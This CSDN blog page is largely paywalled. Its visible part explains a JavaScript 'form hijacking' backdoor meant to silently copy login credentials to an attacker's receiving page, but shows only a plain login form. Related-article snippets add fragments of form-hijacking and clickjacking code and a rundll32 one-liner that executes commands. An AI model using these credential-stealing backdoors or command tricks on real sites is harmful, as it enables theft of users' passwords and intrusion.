javascript表单劫持用户密码(后门免杀)

最新推荐文章于 2023-06-04 15:56:16 发布
VIP文章 最新推荐文章于 2023-06-04 15:56:16 发布
阅读量3.1k 收藏 3
点赞数
分类专栏: web安全 编程语言 网站安全 文章标签: 漏洞分析 密码安全 量子密码 入侵检测
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wodafa/article/details/72528431
版权
试验开始 javascript表单劫持

其实应该可以留有很多后门,但是我暂时只想到这一种,还希望社区的大神能够完善这篇文章·~~~~
原理:在正常的登陆页面,留下一段恶意JS代码,在登陆账号密码的同时,也会把账号密码悄悄的发送到我们的站点上~~~

test.html 正常页面

test2.php 用来验证账号密码数据的正常页面

test3.php 攻击站点用来接收账号密码的页面

http://127.0.0.1  你自己的攻击站

RSA 2017安全大会·密码学专场研讨会

实用入侵指南:真·现场开锁教程


正常页面 Test.html




原始的界面,自己简化了,代码内容如下
[AppleScript]  纯文本查看  复制代码
?
1
2
3
4
5
6
7
8
9
< form action = "test2.php" method = "POST" id = "form" >
 
   < input type = "text" name = "user" >
 
   < input type = "password" name = "pass" >
 
   < input type = "submit" >
 
< / form >

一般的情况下输入密码,数据提交给test2.php,很正常的一个页面~~
现在我们要在test.html里插入一段代码,用JS动态的创建一个iframe,包含表单里账号密码的值,把表单里的值发送到test3.php(我们的恶意接收站点)里 
最低0.47元/天 解锁文章
i春秋论坛
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
javascript 表单的友好用户体现
10-30
javascript 表单的友好用户体现代码
表单劫持代码编写(后门可用)
xiaoHn000的博客
04-07 846
今天给大家分享一下自己写的表单劫持(可作后门等): <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>网站后台管理系统 </title> </head> <body> <form a...
js学习Proxy
最新发布
weixin_53296485的博客
06-04 4001
Proxy是ES6中新增的一个功能,它可以在某个对象前架设一个“拦截器”,从而可以对该对象的访问进行拦截和控制。可以理解为是对对象访问的一个代理,通过代理可以改变对象的默认行为。
前端网络安全整理
qq_53058639的博客
02-08 687
其实前端不需要过硬的网络安全方面的知识,但是能够了解大多数的网络安全,并且可以进行简单的防御前两三个是需要的,可能你自己不想知道,但是面试官想让你知道,没办法。那就赶紧过来康康吧!哈哈...
利用javaScript窃取本地表单密码
月下淡水
11-07 1295
现如今,很多浏览器都有智能填写表单功能,当我们第一次在网站上填写某个表单并且登陆的时候, 浏览器会询问我们是否记住帐号密码以便下次登陆,当我们选择是的时候,浏览器会帮我们把帐号密码 保存起来,当我们下次访问那个网页的时候,会发现浏览器就会自动地帮我们把用户名和密码都填写好 。如我们学们学校的教务处网 : 此时,表单里的用户名和密码已经被填写,因为用户名的表单类型通常type="text"
script、iframe注入型防运营商劫持
JUSTIN的博客
11-25 1071
(一)前言 准确是防运营商劫持就是防script、iframe注入型劫持,属于HTTP劫持中的一种。主要是劫持js文件,然后在网页中通过js脚本往网页中注入图片和链接或者框架广告,也叫流量劫持。 至于劫持类型,这里我建议,看这篇文章 (二) ...
点击劫持之iframe覆盖 学习笔记
Yoo_666的博客
07-25 1134
文章目录点击劫持分类iframe覆盖原理相关技术运用结合CSRF结合XSS示例代码防御方法X-FRAME-OPTIONS机制使用 FrameBusting 代码使用认证码认证用户 点击劫持 点击劫持 (Clickjacking) 技术又称为界面伪装攻击 (UI redress attack ),是一种视觉上的欺骗手段 分类 iframe覆盖 图片覆盖 iframe覆盖 原理 攻击者使用一个或多个透明的 iframe 覆盖在一个正常的网页上,然后诱使用户在该网页上进行操作,当用户在不知情的情况下点击
JavaScript判断用户是否对表单进行了修改的方法
10-24
主要介绍了JavaScript判断用户是否对表单进行了修改的方法,实例分析javascript表单操作与判定的技巧,需要的朋友可以参考下
基于JavaScript实现表单密码的隐藏和显示出来
10-22
为了网站的安全性,很多朋友都把密码设的比较复杂,但是如何密码不能明显示,不知道输的是对是错,为了安全起见可以把密码显示的,那么...下面通过本文给大家介绍JavaScript实现表单密码的隐藏和显示,需要的朋友参考下
常见后门伪装技巧常见后门伪装技巧常见后门伪装技巧
05-28
常见后门伪装技巧常见后门伪装技巧常见后门伪装技巧
javascript密码验证
10-23
主要介绍了javascript密码验证的实现方法,过程很简单,适合初学者学习研究,需要的朋友可以参考下
iframe劫持
goddemon
11-03 989
攻击方法 作用:钓鱼进阶 iframe伪造源码 伪造① <html> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <head> <title>点劫持POC</title> <style> iframe { width: 1440px; height: 900px; position: absolute; top: -0px; left: -0p
Web入侵安全检测之表单提交 (转)
weixin_30591551的博客
04-01 156
文章内容有些过时,但基本思想还是可以学习的,自己保存个日志,以便自己查阅。 在Web程序设计中,处理表单提交的数据是客户端向SERVER传递数据的主要方法,表单数据的提交方法有两种Post方法和Get方法,当使用Post方法时,数据由标准的输入设备读入,当使用Get方法时,数据由CGI变量QUERY_STRING传递给表单数据处理程序,当Post方法一般不会在服务器上留下痕迹。具体的实现过...
xss 表单劫持(from通用明文记录)
weixin_34258078的博客
04-10 1171
大家都知道,在提交form表单时会调用onsubmit方法,既然调用了onsubmit,说明表单中该填的项肯定都已经填好了,这时,我们通过修改onsubmit方法,便可以获取表单中的信息.xss.js:varf=document.forms['from1']; if(f==undefined) { f=document.getElementById('');...
【JS】数据劫持
qq_45677671的博客
03-02 835
数据劫持 代码分析: <body> <input type="text" id="data" value="hello world"> </body> <script> // 定义一个对象 var obj = { data : "hello world" } </script> 1. 实现文本框中的内容发生了变化,对象中的data也要跟着发生变化,保持一致 如何监听到文本框中的值发生变化呢? 使用oninput事件:在用户输入时
扩展知识——JS的劫持技术
m0_59345890的博客
07-07 599
1、黑客劫持网络数据包 然后暴力解码(逆向工程)个人隐私数据被窃取 这里不作说明,感兴趣的自己了解 2、系统的内置功能的重写 3、this关键字的引用劫持 1、call()方法,相当于偷取别人的方法 例如: <script> var obj={name: "karen" ,say:function( ){console.log(this.name)}} var obj2={name : "jack"} obj.say.call(obj2)//相当于是ob
宝塔服务器网站js劫持,宝塔面板服务器黑名单ip直接导入就可以
weixin_42370743的博客
08-04 791
宝塔面板服务器黑名单ip直接导入就可以下载之后直接导入部分黑名单ip列表163.204.255.184112.115.32.175116.52.86.17261.146.189.112182.143.105.50116.18.228.168182.143.104.65118.119.21.29182.143.106.132118.119.23.200182.143.106.15182.143.10...
利用Javascript后门的利用方式
KHOST的博客
03-16 1943
//Execute A Command rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("calc"); //Write To A File rundll32.exe javascript:"\..\m...
JavaScript完成修改用户密码的功能
05-22
首先,你需要一个表单来接收用户输入的旧密码和新密码。例如: ```html <form> <label for="oldPassword">旧密码:</label> <input type="password" id="oldPassword" name="oldPassword"><br><br> <label for="newPassword">新密码:</label> <input type="password" id="newPassword" name="newPassword"><br><br> <button type="submit">修改密码</button> </form> ``` 接下来,你需要编写JavaScript代码来处理表单的提交事件。你可以使用XMLHttpRequest对象或Fetch API来向服务器发送请求并处理响应。 这里提供一个使用Fetch API的示例代码: ```javascript const form = document.querySelector('form'); form.addEventListener('submit', event => { event.preventDefault(); // 阻止表单默认提交行为 const oldPassword = document.querySelector('#oldPassword').value; const newPassword = document.querySelector('#newPassword').value; const url = '/change-password'; // 替换成你的服务器端接口地址 fetch(url, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ oldPassword: oldPassword, newPassword: newPassword }) }) .then(response => { if (response.ok) { alert('密码修改成功!'); } else { alert('密码修改失败!'); } }) .catch(error => { console.error(error); alert('发生错误,请重试!'); }); }); ``` 在这个示例代码中,我们使用Fetch API来发送一个POST请求,将旧密码和新密码作为JSON数据放在请求体中。服务器端接口需要解析请求体并验证旧密码是否正确,然后修改密码并返回响应。如果响应状态码为200,则表示密码修改成功。否则,就表示密码修改失败,需要提示用户重新尝试。 需要注意的是,密码修改涉及到安全性问题,你需要在服务器端进行适当地验证和加密。这里仅提供一个示例代码,具体实现取决于你的具体需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值